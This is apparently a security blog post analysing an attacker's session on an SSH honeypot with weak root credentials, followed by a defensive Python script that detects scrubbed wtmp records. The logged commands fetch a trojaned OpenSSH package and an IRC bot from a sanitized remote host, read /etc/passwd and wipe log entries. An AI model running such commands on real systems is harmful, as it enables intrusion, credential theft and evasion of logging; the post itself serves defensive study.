Intruders: Weak SSH credentials

We will start the series with an example of weak SSH credential exploitation. We set up a Linux server on which remote root login was deliberately allowed. The root password was also set to something that SSH scanners were likely to hit most of the time.

We had to wait a few hours for an attacker to arrive on the system. Below is a log of the commands he issued. We sanitized a few IP addresses and URLs for safety reasons.

w
cat /etc/passwd
cat /proc/cpuinfo
ls
wget <poistettu>.com/i[BS]sirsky/bkd
tar xzvf bkd
cd ./–/
./inst
ls
mv zap /bin
cd ..
rm -rf bkd
rm -rf ./–/
ls
w
zap <ip.ip.ip.ip>.d
w
ls
ls
cat /etc/hosts
w
ls
ls -a
wget <poistettu>.com/sirsky/code.tgz
tar xzvf code.jpg
[U-ARROW][BS][BS][BS]tgz
cd .n
./start da[BS][BS]adware
cd ..
rm -rf code.tgz
w

Judging by the typos in some of the commands, there was a real user at the other end rather than an automated program. Also take note of the repeated use of the 'w' command (which shows all logged-in users and what they are doing). We guess that had the attacker spotted someone else logged in to the system, they would have aborted the attack.

After first entering the system the attacker checked the list of users configured on the system from /etc/passwd, after which they dug up processor information from /proc/cpuinfo. Next, the attacker downloaded a file called 'bkd' from an external URL. More on that file below.

After the attacker installed the 'bkd' package he deleted the source code. In addition, he used a binary called 'zap' to delete all log entries that contained the IP address he had used.
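A defender-side check for the kind of log cleaning described above, added here as an example and not part of the original post. It assumes that zap-style cleaners blank the matching wtmp records in place rather than removing them (the classic behaviour of this tool family), and it works on a constructed little-endian wtmp sample; on a real host you would read /var/log/wtmp instead.

```python
import struct

# glibc utmp/wtmp record: 384 bytes. Little-endian is fixed here so the
# constructed sample below parses identically on any host (assumption).
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)  # 384
USER_PROCESS, DEAD_PROCESS = 7, 8

def _cstr(raw):
    """Decode a NUL-padded fixed-width field."""
    return raw.rstrip(b"\0").decode(errors="replace")

def pack_record(ut_type, pid, line, user, host, ts):
    """Build one wtmp record; used only to construct the sample file."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"",
                       user.encode(), host.encode(), 0, 0, 0, ts, 0, 0, 0, 0, 0)

def parse_wtmp(data):
    """One dict per record (a trailing partial record is ignored)."""
    recs = []
    for off in range(0, len(data) - len(data) % UTMP_SIZE, UTMP_SIZE):
        f = struct.unpack(UTMP_FMT, data[off:off + UTMP_SIZE])
        recs.append({"offset": off, "type": f[0], "line": _cstr(f[2]),
                     "user": _cstr(f[4]), "host": _cstr(f[5]), "ts": f[9]})
    return recs

def find_scrubbed(data):
    """Offsets of all-zero records. wtmp is append-only, so a real session
    never writes one; a cleaner that blanks matching entries in place does."""
    return [r["offset"] for r in parse_wtmp(data)
            if data[r["offset"]:r["offset"] + UTMP_SIZE] == bytes(UTMP_SIZE)]

def find_orphan_logouts(data):
    """Offsets of logout records whose tty has no earlier login record,
    the other trace a blanked login leaves behind."""
    open_lines, orphans = set(), []
    for r in parse_wtmp(data):
        if r["type"] == USER_PROCESS:
            open_lines.add(r["line"])
        elif r["type"] == DEAD_PROCESS and r["line"] in open_lines:
            open_lines.discard(r["line"])
        elif r["type"] == DEAD_PROCESS:
            orphans.append(r["offset"])
    return orphans

# Constructed sample: an admin login, an attacker login that a cleaner has
# zeroed out, and the attacker's logout, which now has no matching login.
SAMPLE_WTMP = (pack_record(USER_PROCESS, 1201, "pts/0", "admin", "10.0.0.5", 1100000000)
               + bytes(UTMP_SIZE)
               + pack_record(DEAD_PROCESS, 1337, "pts/1", "", "", 1100003600))

if __name__ == "__main__":
    print("zeroed records at:", find_scrubbed(SAMPLE_WTMP))        # [384]
    print("orphan logouts at:", find_orphan_logouts(SAMPLE_WTMP))  # [768]
```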

Next, he checked the /etc/hosts file, apparently to see whether it would reveal any other computers on the LAN that he could have attacked using the honeypot as a jump host.

Next, he downloaded another package from the same site, this time a file called code.tgz; we will get to its contents later on. Again, after installation and activation the attacker removed all source code from the system. At this point we decided to pull the plug on the attack and disconnected the machine to await further examination.

Now to the downloaded packages. The package the intruder downloaded first, 'bkd', is a backdoored version of OpenSSH. The attacker had modified and added code so that every time a user logs on to the compromised system, their username, password and IP address are sent to the attacker via email. This allows the attacker to compromise further systems. Furthermore, the backdoor in the downloaded OpenSSH allows the attacker to regain root access even if the root password is changed.

The other package that was downloaded and installed was a slightly modified copy of an IRC bot known as EnergyMech. With it the attacker can easily execute commands remotely on the compromised system without having to log on to the machine. The bot was set up to join a specific channel on a public IRC network, and when we visited it we spotted around 12 compromised machines in the botnet-to-be. We sent abuse mails to the relevant ISPs to get them cleaned.

We also managed to trace the attacker to a certain town in Romania. We also found other data that helped establish the attacker's name, and all of it will be sent to Romanian law enforcement. Unfortunately, not all attacks are as easily traced as this one was.

We intend to write more entries in the Intruders category, showing a variety of attacks similar to the one above.
